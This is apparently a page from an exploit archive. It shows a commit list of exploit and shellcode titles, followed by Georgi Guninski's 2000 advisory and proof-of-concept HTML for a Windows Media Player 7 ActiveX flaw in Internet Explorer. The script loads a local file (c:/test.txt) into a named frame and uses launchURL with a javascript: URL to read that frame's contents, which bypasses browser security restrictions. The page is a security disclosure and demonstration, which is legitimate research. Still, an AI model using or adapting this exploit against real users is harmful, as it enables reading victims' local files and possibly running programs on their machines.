880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
61 lines
No EOL
2.5 KiB
HTML
61 lines
No EOL
2.5 KiB
HTML
source: https://www.securityfocus.com/bid/2167/info
|
|
|
|
Windows Media Player is an application used for digital audio, and video content viewing. It can be embedded in webpages as an ActiveX control.
|
|
|
|
It is possible to execute a javascript URL from within the Windows Media Player ActiveX control embedded in HTML. This javascript can be executed in arbitrary "already open" frames, specified within the ActiveX control. By doing this, an attacker can take over the frame's DOM (document object model), bypassing security restrictions. This would be accomplished through a special webpage and having the victim visit the webpage.
|
|
|
|
An attacker exploiting this vulnerability can read files on the users filesystem and reportedly execute arbitrary programs on the victim host.
|
|
|
|
<HTML>
|
|
<HEAD>
|
|
<TITLE>
|
|
Windows Media Player 7 and IE vulnerability - executing arbitrary programs
|
|
</TITLE>
|
|
</HEAD>
|
|
<BODY>
|
|
<H3>
|
|
Windows Media Player 7 and IE vulnerability - executing arbitrary programs
|
|
</H3>
|
|
<BR>
|
|
<p>Legal Notice:
|
|
<br>This Advisory and Demonstration is Copyright (c) 2000 Georgi Guninski. You may distribute
|
|
it unmodified. You may not modify it and distribute it or distribute parts
|
|
of it without the author's written permission.
|
|
<p>Disclaimer:
|
|
<br>The opinions expressed in this advisory and program are my own and
|
|
not of any company.
|
|
<br>The usual standard disclaimer applies, especially the fact that Georgi
|
|
Guninski
|
|
<br>is not liable for any damages caused by direct or indirect use
|
|
of the information or functionality provided by this advisory or program.
|
|
<br>Georgi Guninski, bears no responsibility for content or misuse of this
|
|
advisory or program or any derivatives thereof.
|
|
<BR>
|
|
Read the <A HREF="wmp7ie-desc.html">Advisory</A> for more information.
|
|
<BR>
|
|
<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" WIDTH=0 HEIGHT=0>
|
|
<PARAM NAME="defaultFrame" value="georgi">
|
|
</object>
|
|
<SCRIPT>
|
|
alert("This page reads C:\\test.txt");
|
|
window.open("file://c:/test.txt","georgi");
|
|
function f()
|
|
{
|
|
document.o1.object.launchURL("javascript:alert(document.body.innerText)");
|
|
}
|
|
setTimeout("f()",1000);
|
|
</SCRIPT>
|
|
<BR>
|
|
<center>(C) Copyright 2000 Georgi Guninski</center>
|
|
<BR>
|
|
<center>
|
|
| <a href="http://www.guninski.com">Home</a> |
|
|
<a href="browsers.html">Internet Explorer</a> |
|
|
<a href="win2k.html">Windows 2000</a> |
|
|
<a href="exploit.html">AIX</a> |
|
|
<a href="netscape.html">Netscape</a> |
|
|
<a href="greets.html">Greets</a> |
|
|
<a href="index.html">More...</a> |
|
|
</center>
|
|
</BODY>
|
|
</HTML> |